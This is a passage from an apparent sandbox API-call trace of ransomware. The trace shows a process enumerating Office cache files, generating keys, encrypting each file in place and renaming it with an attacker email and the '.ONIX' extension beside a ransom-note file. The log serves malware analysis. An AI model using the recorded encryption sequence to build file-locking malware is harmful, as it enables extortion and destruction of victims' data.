lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PowerPointMUI.xml", cAlternateFileName="POWERP~1.XML")) returned 1 [0072.316] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0072.316] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0072.316] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458308 [0072.316] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0072.316] GetLastError () returned 0x0 [0072.316] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x478 [0072.317] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0072.317] LockFile (hFile=0x478, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x5aa, nNumberOfBytesToLockHigh=0x0) returned 1 [0072.317] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.317] ReadFile (in: hFile=0x478, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0072.318] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.319] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.319] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0072.319] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0072.319] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", dwFileAttributes=0x80) returned 1 [0072.319] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 81 [0072.319] GetProcessHeap () returned 0x410000 [0072.319] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x112) returned 0x4b5b28 [0072.319] lstrcpyW (in: lpString1=0x4b5b28, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" [0072.319] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0072.319] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1450) returned 1 [0072.319] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x5aa [0072.319] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0072.319] GetProcessHeap () returned 0x410000 [0072.319] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4b2b40 [0072.319] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x100) returned 1 [0072.320] WriteFile (in: hFile=0x478, lpBuffer=0x4b2b40*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2b40*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0072.683] WriteFile (in: hFile=0x478, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0072.686] WriteFile (in: hFile=0x478, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0072.690] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5aa) returned 0x4b5c48 [0072.690] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5aa) returned 0x4b6200 [0072.690] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.690] ReadFile (in: hFile=0x478, lpBuffer=0x4b5c48, nNumberOfBytesToRead=0x5aa, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b5c48*, lpNumberOfBytesRead=0x367f44c*=0x5aa, lpOverlapped=0x0) returned 1 [0072.691] SetFilePointer (in: hFile=0x478, lDistanceToMove=-1450, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.691] WriteFile (in: hFile=0x478, lpBuffer=0x4b6200*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b6200*, lpNumberOfBytesWritten=0x367f44c*=0x5aa, lpOverlapped=0x0) returned 1 [0072.692] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b5c48 | out: hHeap=0x410000) returned 1 [0072.692] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b6200 | out: hHeap=0x410000) returned 1 [0072.692] UnlockFile (hFile=0x478, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x5aa, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0072.692] CloseHandle (hObject=0x478) returned 1 [0072.694] GetProcessHeap () returned 0x410000 [0072.694] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b40 | out: hHeap=0x410000) returned 1 [0072.694] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0072.697] GetProcessHeap () returned 0x410000 [0072.697] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b5b28 | out: hHeap=0x410000) returned 1 [0072.697] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0072.697] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0072.697] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0072.697] FindNextFileW (in: hFindFile=0x48e930, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8b079d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x431a290, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PptLR.cab", cAlternateFileName="")) returned 1 [0072.697] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0072.697] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0072.697] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458308 [0072.697] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0072.697] GetLastError () returned 0x0 [0072.697] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0072.697] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458308 | out: hHeap=0x410000) returned 1 [0072.697] GetLastError () returned 0x0 [0072.697] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47fa90 [0072.697] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0072.697] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0072.697] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0072.697] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0072.697] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47fa90 | out: hHeap=0x410000) returned 1 [0072.697] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa0) returned 0x461440 [0072.697] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48df08 [0072.697] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4b2770 [0072.697] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x478 [0072.698] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0072.699] LockFile (hFile=0x478, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x431a290, nNumberOfBytesToLockHigh=0x0) returned 1 [0072.699] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.699] ReadFile (in: hFile=0x478, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0072.702] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.702] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.702] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0072.702] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0072.702] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", dwFileAttributes=0x80) returned 1 [0072.702] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 73 [0072.702] GetProcessHeap () returned 0x410000 [0072.703] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0072.703] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" [0072.703] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0072.703] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=70361744) returned 1 [0072.703] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x431a290 [0072.703] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0072.703] GetProcessHeap () returned 0x410000 [0072.703] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4b2b40 [0072.703] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x100) returned 1 [0072.703] WriteFile (in: hFile=0x478, lpBuffer=0x4b2b40*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2b40*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0072.706] WriteFile (in: hFile=0x478, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0072.707] WriteFile (in: hFile=0x478, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0072.708] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x431a290) returned 0x3680020 [0072.710] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x431a290) returned 0x79a0020 [0072.711] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.711] ReadFile (in: hFile=0x478, lpBuffer=0x3680020, nNumberOfBytesToRead=0x431a290, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x431a290, lpOverlapped=0x0) returned 1 [0088.136] UnlockFile (hFile=0x478, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x431a290, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.136] CloseHandle (hObject=0x478) returned 1 [0088.385] GetProcessHeap () returned 0x410000 [0088.385] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b40 | out: hHeap=0x410000) returned 1 [0088.385] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0088.387] GetProcessHeap () returned 0x410000 [0088.387] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0088.387] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0088.387] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0088.388] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0088.388] FindNextFileW (in: hFindFile=0x48e930, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0088.388] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0088.388] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0088.388] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458308 [0088.388] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0088.388] GetLastError () returned 0x0 [0088.388] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x478 [0088.388] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0088.388] LockFile (hFile=0x478, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x75e, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.389] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.389] ReadFile (in: hFile=0x478, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0088.390] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.390] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.390] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0088.390] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0088.390] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0088.391] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0088.391] GetProcessHeap () returned 0x410000 [0088.391] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0088.391] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" [0088.391] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0088.391] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1886) returned 1 [0088.391] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x75e [0088.391] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0088.391] GetProcessHeap () returned 0x410000 [0088.391] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4b2b40 [0088.391] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x100) returned 1 [0088.391] WriteFile (in: hFile=0x478, lpBuffer=0x4b2b40*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2b40*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0088.393] WriteFile (in: hFile=0x478, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0088.394] WriteFile (in: hFile=0x478, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0088.395] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x75e) returned 0x4b5b28 [0088.395] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x75e) returned 0x4b6290 [0088.395] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.395] ReadFile (in: hFile=0x478, lpBuffer=0x4b5b28, nNumberOfBytesToRead=0x75e, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b5b28*, lpNumberOfBytesRead=0x367f44c*=0x75e, lpOverlapped=0x0) returned 1 [0088.395] SetFilePointer (in: hFile=0x478, lDistanceToMove=-1886, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.395] WriteFile (in: hFile=0x478, lpBuffer=0x4b6290*, nNumberOfBytesToWrite=0x75e, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b6290*, lpNumberOfBytesWritten=0x367f44c*=0x75e, lpOverlapped=0x0) returned 1 [0088.396] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b5b28 | out: hHeap=0x410000) returned 1 [0088.396] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b6290 | out: hHeap=0x410000) returned 1 [0088.396] UnlockFile (hFile=0x478, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x75e, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.396] CloseHandle (hObject=0x478) returned 1 [0088.397] GetProcessHeap () returned 0x410000 [0088.397] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b40 | out: hHeap=0x410000) returned 1 [0088.397] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0088.399] GetProcessHeap () returned 0x410000 [0088.399] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0088.399] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0088.399] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0088.400] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0088.400] FindNextFileW (in: hFindFile=0x48e930, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30bcff70, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30bcff70, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bcff70, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0088.400] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0088.400] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0088.400] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458308 [0088.400] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0088.400] GetLastError () returned 0x0 [0088.400] FindNextFileW (in: hFindFile=0x48e930, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, 